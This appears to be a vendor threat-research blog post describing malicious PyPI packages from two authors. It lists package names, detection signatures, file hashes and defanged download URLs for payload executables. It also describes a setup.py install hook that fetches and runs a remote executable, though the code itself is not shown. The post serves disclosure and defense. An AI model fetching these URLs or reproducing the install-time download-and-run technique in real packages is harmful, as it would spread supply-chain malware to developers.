This report looks at two sets of malicious PyPI packages published in early July. We have bundled them together by author to demonstrate how it is common for the same author to release several similar or even identical malicious packages using different PyPI account IDs. For example, the packages in the first set were written by a threat actor who goes by the handle Josef M and uses the email address “[email protected].” The second set was written by an author with the PyPI ID “killskids.”

The First Set of Packages

• pycolouringsextV1 (version 1.1.0)
• sysfontstoolV1 (version 1.1.0)
• syscoloringsaddition (version 1.1.0)
• pitutil (version 1.0.0)
• syssqlitedbmodules (version 1.1.0)

These packages all had a similar project page style, as shown below:

The Second Set of Packages

• killskids-auth (versions 1.0.5, 2.0.0)
• testpackageforyoutube (version 1.0.0)

The setup.py in these packages tries to use cmdclass commands that may run when installing the package, as shown below.

We can see that this setup.py tries to connect to a URL to download a potentially malicious executable file and run it. However, the payload for this package was unavailable at the time of our writing.

Conclusion

This blog shows that the same author often uses different PyPI IDs when posting their malicious packages. This is likely an attempt to spread their malware as much as possible before it is taken down. Using similar code for each package is a quick and easy way for malware authors to distribute malware quickly while increasing its shelf life. Discovering new OSS threats hidden in millions of packages is like looking for a needle in a haystack. Our new AI engine can work far better than traditional approaches, discovering threats in near real-time to protect organizations from malicious threat actors lying in wait.

Fortinet Protections

FortiGuard AntiVirus detects the malicious files identified in this report as

pycolouringsextV1-1.1.0 __init__.py: Python/Agent.TENR!tr

sysfontstoolV1-1.1.0 __init__.py: Python/Agent.TENR!tr

syscoloringsaddition-1.1.0 __init__.py: Python/Agent.TENR!tr

pitutil-1.0.0 __init__.py: Python/Agent.TENR!tr

syssqlitedbmodules-1.1.0 __init__.py: Python/Agent.TENR!tr

killskids-auth-1.0.5 setup.py: Python/Agent.SDIK!tr

killskids-auth-2.0.0 setup.py: Python/Agent.SDIK!tr

testpackageforyoutube-1.0.0 setup.py: Python/Agent.SDIK!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.

The FortiDevSec SCA scanner detects malicious packages, including those cited in this report, that may operate as dependencies in users' projects in test phases and prevents those dependencies from being introduced into users' products.

If you believe these or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs

pycolouringsextV1-1.1.0 __init__.py

            475e15da18cd785eb079981585a6519b

sysfontstoolV1-1.1.0 __init__.py

            475e15da18cd785eb079981585a6519b

syscoloringsaddition-1.1.0 __init__.py

            188a8e8f9afb0423276cbe92f8846c47

pitutil-1.0.0 __init__.py

            f658a9d876041b6434d073d883c72865

syssqlitedbmodules-1.1.0 __init__.py

            188a8e8f9afb0423276cbe92f8846c47

killskids-auth-1.0.5 setup.py

            d643d5f2e8631bcb831e3e79d198a061

killskids-auth-2.0.0 setup.py

            9286d9ad57a21c49a06dac2fb7f463ba

testpackageforyoutube-1.0.0 setup.py

            9c8cbdc00c745407198863372d5ca06c

Malicious URLs

hxxps://github[.]com/killskids/test/raw/main/calc[.]exe
hxxps://github[.]com/killskids/test/raw/main/auth-server[.]exe
hxxps://file[.]io/IWbO1KYBw4Bn